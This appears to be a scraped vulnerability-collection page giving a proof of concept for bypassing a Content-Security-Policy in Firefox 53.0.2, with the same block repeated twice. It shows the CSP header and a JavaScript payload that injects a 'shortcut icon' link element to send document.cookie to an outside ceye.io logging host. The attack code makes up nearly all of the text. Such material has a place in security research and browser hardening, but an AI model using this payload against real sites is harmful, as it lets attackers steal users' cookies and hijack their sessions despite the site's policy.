VULHUB ™

#### Firefox 53.0.2 Version PoC: http://server.n0tr00t.com/firefox/ffcsp53.0.2.php PiC: https://ws1.sinaimg.cn/large/c334041bgy1ffeb2a6xfej20ph09nacs.jpg **CSP RULE:** ``` header("Content-Security-Policy: default-src 'none' 'unsafe-inline';"); ``` **Bypass:** ``` x = (new Date()).valueOf(); document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";"; ffn0t= document.head.appendChild(document.createElement("link")); ffn0t.rel = "shortcut icon"; ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie; ```

#### Firefox 53.0.2 Version PoC: http://server.n0tr00t.com/firefox/ffcsp53.0.2.php PiC: https://ws1.sinaimg.cn/large/c334041bgy1ffeb2a6xfej20ph09nacs.jpg **CSP RULE:** ``` header("Content-Security-Policy: default-src 'none' 'unsafe-inline';"); ``` **Bypass:** ``` x = (new Date()).valueOf(); document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";"; ffn0t= document.head.appendChild(document.createElement("link")); ffn0t.rel = "shortcut icon"; ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie; ```